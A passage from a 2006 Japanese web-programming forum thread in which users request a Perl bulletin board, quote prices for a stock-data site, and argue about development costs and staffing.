一定期間内に応募から抽選で選ぶタイプなら
ひょっとすると重複するものは一票にまとめ、
さらに人口の偏りを補正して地域的に平等になるように選ぶよな。
関東地方よりも田舎から出した方が圧倒的に当たりやすいのは昔から知られた話。
91+++
2006/10/24(火) 20:36:36ID:??? Webプログラム板から見れば、害虫だと言っていいだろ?
92nobodyさん
2006/10/24(火) 21:42:31ID:??? どこの誤爆だ?
93nobodyさん
2006/11/04(土) 01:36:32ID:??? >>55
1000万円から承ります。
正し、既存サイトのデータ2次利用などの違法行為は
当方ではお受けできかねますので、証券取引所及び
株価データ提供会社とのご契約をあなた様で行なって
もらう必要があります。
1000万円から承ります。
正し、既存サイトのデータ2次利用などの違法行為は
当方ではお受けできかねますので、証券取引所及び
株価データ提供会社とのご契約をあなた様で行なって
もらう必要があります。
94nobodyさん
2006/11/04(土) 08:43:56ID:u6pCrqNj 誰か掲示板を作ってください!なるべくPerlでお願いします。
探したんですけど条件に合うものが見つからなかったので…。
1.スレッド式でタイトルをクリックすると本文がみれるタイプ
2.画像がアップできる
3.禁止ワードが設定出来る
4.IPアドレスで規制出来る
5.3と4は管理画面でいじれる
http://bbs.0zero.jp/pc/
ここの「スレッド」っていうタイプの掲示板に4のIP規制がついたイメージです。
で、書き込まれたらスレ主さんに通知がいくように出来たら最高です。
やってもいいという人がいたらもうちょっと詳しく書きますのでお願いします。
探したんですけど条件に合うものが見つからなかったので…。
1.スレッド式でタイトルをクリックすると本文がみれるタイプ
2.画像がアップできる
3.禁止ワードが設定出来る
4.IPアドレスで規制出来る
5.3と4は管理画面でいじれる
http://bbs.0zero.jp/pc/
ここの「スレッド」っていうタイプの掲示板に4のIP規制がついたイメージです。
で、書き込まれたらスレ主さんに通知がいくように出来たら最高です。
やってもいいという人がいたらもうちょっと詳しく書きますのでお願いします。
95nobodyさん
2006/11/04(土) 08:55:41ID:???96nobodyさん
2006/11/04(土) 13:28:54ID:??? PHPでよければ何か作りますよ。
97nobodyさん
2006/11/04(土) 13:46:14ID:??? Perlでもいいけどマルチは氏ね。
98nobodyさん
2006/11/04(土) 15:52:59ID:VcCXhxVG >>55
>なお運営社側の人数が増えれば増えるほど折半したさいの一人当たりのお金は減ります
あんた、資本と雇用の区別すらついてないね。
金が無いなら、プログラム制作者がもっとも資本を投下した事になるんだぞ?
なんで、運営人数が増えるだけで、取り分が分割されてくんだ?
お前ほんとに投資についての知識あんのか?
>なお運営社側の人数が増えれば増えるほど折半したさいの一人当たりのお金は減ります
あんた、資本と雇用の区別すらついてないね。
金が無いなら、プログラム制作者がもっとも資本を投下した事になるんだぞ?
なんで、運営人数が増えるだけで、取り分が分割されてくんだ?
お前ほんとに投資についての知識あんのか?
99nobodyさん
2006/11/04(土) 16:20:52ID:??? 100のシステムを作るのにかかる人数/日数は1人/100日と仮定する。
1人の人件費1日1万円かかると仮定する。
以上の仮定より、人数によってシステム構築にかかる日数は以下の結果が成り立つ。
1人/100日
2人/50日
10人/10日
100人/1日
依頼者が完成を早めたいなら人数をたくさん雇う
結果、月にかかる人件費は高くなるが、完成が早まる。
労働者20人雇用/一ヶ月20万円の人件費で5日でシステムが完成する。
労働者1人雇用/一ヶ月1万円の人件費で100日でシステムが完成する。
結果、>>98の言い分は偽である。
1人の人件費1日1万円かかると仮定する。
以上の仮定より、人数によってシステム構築にかかる日数は以下の結果が成り立つ。
1人/100日
2人/50日
10人/10日
100人/1日
依頼者が完成を早めたいなら人数をたくさん雇う
結果、月にかかる人件費は高くなるが、完成が早まる。
労働者20人雇用/一ヶ月20万円の人件費で5日でシステムが完成する。
労働者1人雇用/一ヶ月1万円の人件費で100日でシステムが完成する。
結果、>>98の言い分は偽である。
レスを投稿する
ニュース
- 【自維】鮭おにぎり198円に絶望、コンビニすら遠い存在に…「生き延びられない」物価高で広がる生活苦★5 [ひぃぃ★]
- 【サッカー】ブラジル戦、NHKは地上波なし 本田圭佑はBSで解説… 悲鳴続出「マジかよ」 地上波はフジテレビが生中継、解説は小野伸二 [冬月記者★]
- 【芸能】田中みな実、実名告白「めっちゃ格好いい」「インスタもフォローした」 W杯日本代表にメロメロも「狙ってないからね?」 [冬月記者★]
- 小学校で英語必修化→学力の格差拡大が深刻…英語嫌いだった夏目漱石に学ぶ、現代の「迷走する早期教育」への処方箋 [バイト歴50年★]
- 【サッカー】「世紀の談合マッチになる予感」J組の一戦が話題…ドローで両チーム決勝T進出の“異例事態” [ゴアマガラ★]
- 【サッカー】W杯の「日本VSブラジル」を他で例えると…Xで問いかけ話題「湘北vs山王」「明徳義塾vs大阪桐蔭」「ドトウvsオペラオー」★2 [o(^・-・^)o★]
- 洋楽好きのJKだけど質問ある?
- 【悲報】小野田卑弥呼大臣(35)、540億円超の損失でも「クールジャパンは順調」 [834922174]
- 経団連「年内には訪中して習主席と面会したい😢レアアースもタングステンももう限界😢」 [931948549]
- ありがとうっていい言葉だよな
- 俺「大将⋯綺麗だァ⋯」大将「て、てやんでぃっ⋯♡」
- 蒲焼さん太郎めっちゃ小さくなってない?